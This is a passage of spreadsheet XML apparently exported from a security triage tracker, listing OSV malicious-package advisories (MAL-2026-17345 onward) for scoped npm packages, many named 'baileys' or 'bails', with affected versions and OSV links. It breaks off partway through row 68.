      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/flowblue</t>
        </is>
      </c>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr"/>
      <c r="S4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@bellaxchuu/flowblue (npm), version(s): 1.5.7.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17345</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17346</t>
        </is>
      </c>
      <c r="D50" s="5" t="inlineStr"/>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="inlineStr"/>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/privatebails</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr"/>
      <c r="S5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@bellaxchuu/privatebails (npm), version(s): 1.4.1.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17346</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17347</t>
        </is>
      </c>
      <c r="D51" s="5" t="inlineStr"/>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="inlineStr"/>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/skyblue</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr"/>
      <c r="S5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@bellaxchuu/skyblue (npm), version(s): 2.1.2.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17347</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17348</t>
        </is>
      </c>
      <c r="D52" s="5" t="inlineStr"/>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="inlineStr"/>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/teambails</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr"/>
      <c r="S5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@bellaxchuu/teambails (npm), version(s): 1.1.9, 1.1.8, 1.1.6, 1.1.4, 1.2.4.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17348</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17349</t>
        </is>
      </c>
      <c r="D53" s="5" t="inlineStr"/>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="inlineStr"/>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/velvetry</t>
        </is>
      </c>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr"/>
      <c r="S5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@bellaxchuu/velvetry (npm), version(s): 0.1.4, 0.1.3.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17349</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17350</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/xtrxbails</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr"/>
      <c r="S5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@bellaxchuu/xtrxbails (npm), version(s): 0.0.8.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17350</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17351</t>
        </is>
      </c>
      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="inlineStr"/>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>npm:@bottino/baileys</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr"/>
      <c r="S5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@bottino/baileys (npm), version(s): 1.0.14, 1.0.13, 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17351</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17352</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr"/>
      <c r="S5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 (npm), version(s): 1.0.3, 1.0.1.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17352</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17353</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys-new</t>
        </is>
      </c>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr"/>
      <c r="S5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@fhkryxv/baileys-new (npm), version(s): 0.3.22.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17353</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17354</t>
        </is>
      </c>
      <c r="D58" s="5" t="inlineStr"/>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="inlineStr"/>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>npm:@hanzofc/baileys</t>
        </is>
      </c>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr"/>
      <c r="S5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@hanzofc/baileys (npm), version(s): 7.0.1, 7.0.0.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17354</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17355</t>
        </is>
      </c>
      <c r="D59" s="5" t="inlineStr"/>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="inlineStr"/>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>npm:@ikanngeming/ikannbail</t>
        </is>
      </c>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr"/>
      <c r="S5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@ikanngeming/ikannbail (npm), version(s): 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17355</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17356</t>
        </is>
      </c>
      <c r="D60" s="5" t="inlineStr"/>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="inlineStr"/>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikkysingle</t>
        </is>
      </c>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr"/>
      <c r="S6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@ikyyjee/ikkysingle (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17356</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17357</t>
        </is>
      </c>
      <c r="D61" s="5" t="inlineStr"/>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="inlineStr"/>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysinggle</t>
        </is>
      </c>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr"/>
      <c r="S6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@ikyyjee/ikyysinggle (npm), version(s): 1.7.7.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17357</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17358</t>
        </is>
      </c>
      <c r="D62" s="5" t="inlineStr"/>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="inlineStr"/>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysingle</t>
        </is>
      </c>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr"/>
      <c r="S6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@ikyyjee/ikyysingle (npm), version(s): 1.7.8.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17358</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17359</t>
        </is>
      </c>
      <c r="D63" s="5" t="inlineStr"/>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="inlineStr"/>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>npm:@japofc/baileys</t>
        </is>
      </c>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr"/>
      <c r="S6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@japofc/baileys (npm), version(s): 2.4.3, 2.4.2, 2.4.1, 2.4.0, 2.3.0, 2.2.0, 2.1.0.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17359</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17360</t>
        </is>
      </c>
      <c r="D64" s="5" t="inlineStr"/>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="inlineStr"/>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>npm:@jojoxyz/condemnedforce-baileys</t>
        </is>
      </c>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr"/>
      <c r="S6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@jojoxyz/condemnedforce-baileys (npm), version(s): 2.3.0.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17360</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17361</t>
        </is>
      </c>
      <c r="D65" s="5" t="inlineStr"/>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="inlineStr"/>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>npm:@kanaraa/baileys</t>
        </is>
      </c>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr"/>
      <c r="S6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@kanaraa/baileys (npm), version(s): 3.5.2, 3.5.1, 3.4.7, 3.4.6, 3.4.5, 3.4.4, 3.4.2, 3.5.0, 3.4.1, 3.4.0, 3.3.0, 3.2.0, 3.1.9, 3.1.8.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17361</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17362</t>
        </is>
      </c>
      <c r="D66" s="5" t="inlineStr"/>
      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="inlineStr"/>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>npm:@kelvdra/baileys</t>
        </is>
      </c>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr"/>
      <c r="S6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@kelvdra/baileys (npm), version(s): 1.0.6-rc.1, 1.0.6, 1.0.5-rc.3.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17362</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17363</t>
        </is>
      </c>
      <c r="D67" s="5" t="inlineStr"/>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="inlineStr"/>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>npm:@kxa/xbails</t>
        </is>
      </c>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr"/>
      <c r="S6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@kxa/xbails (npm), version(s): 0.0.5.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17363</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17364</t>
        </is>
      </c>
      <c r="D68" s="5" t="inlineStr"/>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="inlineStr"/>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr">
        <is>
